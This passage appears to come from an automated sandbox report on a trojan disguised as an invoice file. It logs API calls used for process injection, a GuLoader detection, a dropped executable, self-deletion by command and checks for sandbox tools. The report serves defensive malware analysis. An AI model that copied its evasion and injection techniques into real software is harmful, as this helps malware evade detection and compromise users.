Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B43800	11_2_03B43800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B49870	11_2_03B49870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B5B870	11_2_03B5B870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BB5870	11_2_03BB5870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFF872	11_2_03BFF872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B26868	11_2_03B26868
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFEFBF	11_2_03BFEFBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B46FE0	11_2_03B46FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF1FC6	11_2_03BF1FC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B4CF00	11_2_03B4CF00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFFF63	11_2_03BFFF63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B41EB2	11_2_03B41EB2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF0EAD	11_2_03BF0EAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B32EE8	11_2_03B32EE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF9ED2	11_2_03BF9ED2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BE0E6D	11_2_03BE0E6D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B60E50	11_2_03B60E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B82E48	11_2_03B82E48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B52DB0	11_2_03B52DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BDFDF4	11_2_03BDFDF4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B49DD0	11_2_03B49DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFFD27	11_2_03BFFD27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B3AD00	11_2_03B3AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B40D69	11_2_03B40D69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF7D4C	11_2_03BF7D4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BD9C98	11_2_03BD9C98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03C0ACEB	11_2_03C0ACEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BC7CE8	11_2_03BC7CE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B5FCE0	11_2_03B5FCE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B58CDF	11_2_03B58CDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B4AC20	11_2_03B4AC20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B30C12	11_2_03B30C12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B43C60	11_2_03B43C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF6C69	11_2_03BF6C69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFEC60	11_2_03BFEC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BEEC4C	11_2_03BEEC4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9BE9F	11_2_02D9BE9F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D82FB0	11_2_02D82FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9CF40	11_2_02D9CF40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D88C80	11_2_02D88C80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D88C7B	11_2_02D88C7B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D82D90	11_2_02D82D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D82D87	11_2_02D82D87

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B910 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75050 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87BE4 appears 96 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAE692 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBEF10 appears 105 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: String function: 1E8F5050 appears 36 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: String function: 1E93EF10 appears 105 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: String function: 1E907BE4 appears 95 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: String function: 1E8AB910 appears 268 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: String function: 1E92E692 appears 86 times

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0243265F NtProtectVirtualMemory,	1_2_0243265F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242CB27 NtAllocateVirtualMemory,LoadLibraryA,	1_2_0242CB27
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242FCFD NtWriteVirtualMemory,	1_2_0242FCFD
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0243069C NtWriteVirtualMemory,	1_2_0243069C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_1E8F2EB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk,	8_2_1E8F2ED0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2E50 NtCreateSection,LdrInitializeThunk,	8_2_1E8F2E50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2F00 NtCreateFile,LdrInitializeThunk,	8_2_1E8F2F00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk,	8_2_1E8F2CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk,	8_2_1E8F2C30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_1E8F2C50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_1E8F2DA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_1E8F2DC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,	8_2_1E8F2D10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_1E8F2B90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk,	8_2_1E8F2BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_1E8F2B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F29F0 NtReadFile,LdrInitializeThunk,	8_2_1E8F29F0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,	8_2_1E8F34E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2E80 NtCreateProcessEx,	8_2_1E8F2E80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2EC0 NtQuerySection,	8_2_1E8F2EC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2E00 NtQueueApcThread,	8_2_1E8F2E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2FB0 NtSetValueKey,	8_2_1E8F2FB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2F30 NtOpenDirectoryObject,	8_2_1E8F2F30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F3C90 NtOpenThread,	8_2_1E8F3C90
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2CD0 NtEnumerateKey,	8_2_1E8F2CD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2C10 NtOpenProcess,	8_2_1E8F2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2C20 NtSetInformationFile,	8_2_1E8F2C20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F3C30 NtOpenProcessToken,	8_2_1E8F3C30
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2D50 NtWriteVirtualMemory,	8_2_1E8F2D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2A80 NtClose,	8_2_1E8F2A80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2AA0 NtQueryInformationFile,	8_2_1E8F2AA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2AC0 NtEnumerateValueKey,	8_2_1E8F2AC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2A10 NtWriteFile,	8_2_1E8F2A10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2B80 NtCreateKey,	8_2_1E8F2B80
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2BE0 NtQueryVirtualMemory,	8_2_1E8F2BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2B00 NtQueryValueKey,	8_2_1E8F2B00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F2B20 NtQueryInformationProcess,	8_2_1E8F2B20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F38D0 NtGetContextThread,	8_2_1E8F38D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F29D0 NtWaitForSingleObject,	8_2_1E8F29D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F4570 NtSuspendThread,	8_2_1E8F4570
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F4260 NtSetContextThread,	8_2_1E8F4260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B734E0 NtCreateMutant,LdrInitializeThunk,	11_2_03B734E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72B90 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_03B72B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72B80 NtCreateKey,LdrInitializeThunk,	11_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72BC0 NtQueryInformationToken,LdrInitializeThunk,	11_2_03B72BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72B10 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_03B72B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72B00 NtQueryValueKey,LdrInitializeThunk,	11_2_03B72B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72A80 NtClose,LdrInitializeThunk,	11_2_03B72A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B729F0 NtReadFile,LdrInitializeThunk,	11_2_03B729F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72F00 NtCreateFile,LdrInitializeThunk,	11_2_03B72F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72E50 NtCreateSection,LdrInitializeThunk,	11_2_03B72E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_03B72DC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72D10 NtQuerySystemInformation,LdrInitializeThunk,	11_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72CF0 NtDelayExecution,LdrInitializeThunk,	11_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72C30 NtMapViewOfSection,LdrInitializeThunk,	11_2_03B72C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B74260 NtSetContextThread,	11_2_03B74260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B74570 NtSuspendThread,	11_2_03B74570
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72BE0 NtQueryVirtualMemory,	11_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72B20 NtQueryInformationProcess,	11_2_03B72B20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72AA0 NtQueryInformationFile,	11_2_03B72AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72AC0 NtEnumerateValueKey,	11_2_03B72AC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72A10 NtWriteFile,	11_2_03B72A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B729D0 NtWaitForSingleObject,	11_2_03B729D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B738D0 NtGetContextThread,	11_2_03B738D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72FB0 NtSetValueKey,	11_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72F30 NtOpenDirectoryObject,	11_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72EB0 NtProtectVirtualMemory,	11_2_03B72EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72E80 NtCreateProcessEx,	11_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72ED0 NtResumeThread,	11_2_03B72ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72EC0 NtQuerySection,	11_2_03B72EC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72E00 NtQueueApcThread,	11_2_03B72E00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72DA0 NtReadVirtualMemory,	11_2_03B72DA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72D50 NtWriteVirtualMemory,	11_2_03B72D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B73C90 NtOpenThread,	11_2_03B73C90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72CD0 NtEnumerateKey,	11_2_03B72CD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B73C30 NtOpenProcessToken,	11_2_03B73C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72C20 NtSetInformationFile,	11_2_03B72C20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72C10 NtOpenProcess,	11_2_03B72C10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B72C50 NtUnmapViewOfSection,	11_2_03B72C50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D98690 NtReadFile,	11_2_02D98690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D987C0 NtAllocateVirtualMemory,	11_2_02D987C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D98710 NtClose,	11_2_02D98710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D985E0 NtCreateFile,	11_2_02D985E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9868D NtReadFile,	11_2_02D9868D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D987C2 NtAllocateVirtualMemory,	11_2_02D987C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9870A NtClose,	11_2_02D9870A

Source: C:\Windows\explorer.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process Stats: CPU usage > 98%

Source: draft_inv dec21.exe, 00000001.00000002.6380674433.0000000000421000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000001.00000002.6382057961.0000000002C40000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameprajesselv.exeFE2XCx Frak vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000000.6373811116.0000000000421000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6919082626.00000000000DC000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000003.6915123008.00000000008F9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs draft_inv dec21.exe
Source: draft_inv dec21.exe, 00000008.00000002.6934097497.000000001EB50000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs draft_inv dec21.exe
Source: draft_inv dec21.exe	Binary or memory string: OriginalFilenameprajesselv.exe vs draft_inv dec21.exe

Source: draft_inv dec21.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zbcdidj04hd0ibmx.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: draft_inv dec21.exe	Virustotal: Detection: 26%
Source: draft_inv dec21.exe	Metadefender: Detection: 20%
Source: draft_inv dec21.exe	ReversingLabs: Detection: 17%

Source: draft_inv dec21.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: unknown	Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe"	Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe

File created: C:\Users\user\AppData\Local\Temp\~DF3F74DA73951D2623.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@68/20

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: wntdll.pdbUGP source: draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: draft_inv dec21.exe, draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdb source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.6378969703.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0040846A push ds; retf	1_2_00408472
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_00407608 push ebx; iretd	1_2_00407609
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_00405C16 push ss; iretd	1_2_00405BC7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_004094E5 push esi; iretd	1_2_004094E7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_00405B7D push ss; iretd	1_2_00405BC7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_00407F07 push ebp; retf	1_2_00407F0F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_00408119 push ebx; iretd	1_2_0040811B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242084B push ss; retf	1_2_02420852
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02425A48 push edi; ret	1_2_02425A89
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02425A84 push edi; ret	1_2_02425A89
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02422B3A push cs; iretd	1_2_02422B3F
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02420BC1 push FFB8EB81h; ret	1_2_02420BC6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242399C push esp; ret	1_2_024239EF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B08CD push ecx; mov dword ptr [esp], ecx	8_2_1E8B08D6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8897A1 push es; iretd	8_2_1E8897A8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8821AD pushad ; retf 0004h	8_2_1E88223F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B021AD pushad ; retf 0004h	11_2_03B0223F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B097A1 push es; iretd	11_2_03B097A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B308CD push ecx; mov dword ptr [esp], ecx	11_2_03B308D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D95640 push 6F0B6D34h; retf	11_2_02D95645
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9B7D5 push eax; ret	11_2_02D9B828
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9A7A6 push es; ret	11_2_02D9A757
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D95B58 push edx; iretd	11_2_02D95B64
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D95B77 push 6371F8CDh; retf	11_2_02D95B7C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9B88C push eax; ret	11_2_02D9B892
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9B82B push eax; ret	11_2_02D9B892
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9B822 push eax; ret	11_2_02D9B828
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D94E9C push 0D2B169Ah; retf	11_2_02D94EBD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_02D9CCF6 push dword ptr [A92E284Ah]; ret	11_2_02D9CD17

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Process created: /c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: /c del "C:\Users\user\Desktop\draft_inv dec21.exe"			Jump to behavior

Source: C:\Windows\System32\oobe\UserOOBEBroker.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\draft_inv dec21.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

